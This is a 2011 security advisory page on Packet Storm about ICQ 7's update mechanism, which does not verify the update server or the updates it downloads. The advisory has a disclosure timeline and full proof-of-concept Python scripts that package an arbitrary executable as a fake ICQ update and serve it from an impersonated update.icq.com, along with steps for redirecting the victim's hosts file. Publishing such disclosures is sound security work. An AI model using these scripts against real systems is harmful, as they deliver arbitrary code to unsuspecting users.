exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ICQ 7 Failed Origin Check

ICQ 7 Failed Origin Check
Posted Jan 14, 2011
Authored by Daniel Seither

ICQ 7 does not check the identity of the update server or the authenticity of the updates that it downloads through its automatic update mechanism. By impersonating the update server (think DNS spoofing), an attacker can act as an update server of its own and deliver arbitrary files that are executed on the next launch of the ICQ client. Since ICQ is automatically launched right after booting Windows by default and it checks for updates on every start, it can be attacked very reliably.Proof of concept code included.

tags | exploit, arbitrary, spoof, proof of concept
systems | windows
SHA-256 | 04f110048b2b3c991e27e6d5e6a6d9b83938b41ab60b12fc8ec01f2728817316

ICQ 7 Failed Origin Check

Change Mirror Download
SUMMARY

The ICQ 7 instant messaging client allows remote code execution due to a
flaw in its automatic update mechanism.


VULNERABLE APPLICATIONS

All versions of ICQ 7 for Windows, up to version 7.2, build 3525 (which
is the current version)

ICQ 6 and older versions were not tested.

Other ICQ clients should not be affected since this is a flaw in the ICQ
software update mechanism and not in the ICQ IM protocol.


DETAILS

ICQ 7 does not check the identity of the update server or the
authenticity of the updates that it downloads through its automatic
update mechanism. By impersonating the update server (think DNS
spoofing), an attacker can act as an update server of its own and
deliver arbitrary files that are executed on the next launch of the ICQ
client. Since ICQ is automatically launched right after booting Windows
by default and it checks for updates on every start, it can be attacked
very reliably.


REPRODUCING

(1) Create the files for the update server (see below,
build_update_files.py)

(2) Run a fake update server (see below, run_update_server.py)

(3) Impersonate the update server. To verify the vulnerability, the
easiest way is to add an entry for update.icq.com to the victim's
\Windows\system32\drivers\etc\hosts file that points to the fake update
server's IP address and clearing it's DNS cache afterwards (ipconfig
/flushdns).

The next victim that is affected by the impersonation and that launches
the ICQ client will now automatically download and install the fake
update. On the next restart of the ICQ software, the fake ICQ.exe will
be executed.


SOLUTION

Stop using ICQ or switch to another IM client until a fix is released
since ICQ 7 does not offer to disable automatic updates.


TIMELINE

2010-11-12
discovered issue

2010-11-13
reported issue to cert.org

2010-11-30
received confirmation from cert.org that they try to contact the vendor

2011-01-13
cert.org publishes vulnerability note because the vendor doesn't react


REFERENCES

Vulnerability Note at cert.org:
http://www.kb.cert.org/vuls/id/680540


FILES

=== START build_update_files.py ===

#!/usr/bin/env python

# ICQ Update File Creator by Daniel Seither (post@tiwoc.de)
#
# Parameter:
# filename of .exe that should be delivered as an update for ICQ.exe
#
# Overwrites ICQ.zip and updates.xml in the current directory
# without a warning!

import sys, os
from hashlib import md5
from zipfile import ZipFile, ZIP_DEFLATED

if len(sys.argv) < 2:
print "argument missing"
sys.exit(1)

f = open(sys.argv[1])
payload = f.read()
f.close()

payload_checksum = md5(payload).hexdigest()
payload_size = len(payload)

f = ZipFile('ICQ.zip', 'w')
f.write(sys.argv[1], 'ICQ.exe', ZIP_DEFLATED)
f.close()

payload_compressed = os.path.getsize('ICQ.zip')

updatesfile = ('<manifest productid="30009" build="9999" serial="9">'
+ '<host url="http://update.icq.com/cb/icq6/30009/"/>'
+ '<file id="31" path="ICQ.exe" hash="%s" size="%s">'
+ '<file format="zip" size="%s" url="ICQ.zip"/>'
+ '</file></manifest>'
) % (payload_checksum, payload_size, payload_compressed)

updatesfile_checksum = md5(updatesfile).hexdigest()
updatesfile = '<!--%s-->\r\n%s' % (updatesfile_checksum, updatesfile)

f = open('updates.xml', 'w')
f.write(updatesfile)
f.close

=== END build_update_files.py ===

=== START run_update_server.py ===

#!/usr/bin/env python

# Fake ICQ update server by Daniel Seither (post@tiwoc.de)
#
# Must be run
# * as root
# * from a directory containing updates.xml and ICQ.zip
# created by build_updates_xml.py

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class ICQRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path == '/cb/icq6/30009/0/updates.xml':
self._respond_with_file('updates.xml')
elif self.path == '/cb/icq6/30009/ICQ.zip':
self._respond_with_file('ICQ.zip')
else:
self.send_error(404)

def _respond_with_file(self, filename):
f = open(filename)
self.send_response(200)
self.end_headers()
self.wfile.write(f.read())
f.close()

httpd = HTTPServer(('', 80), ICQRequestHandler)
httpd.serve_forever()

=== END run_update_server.py ===
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close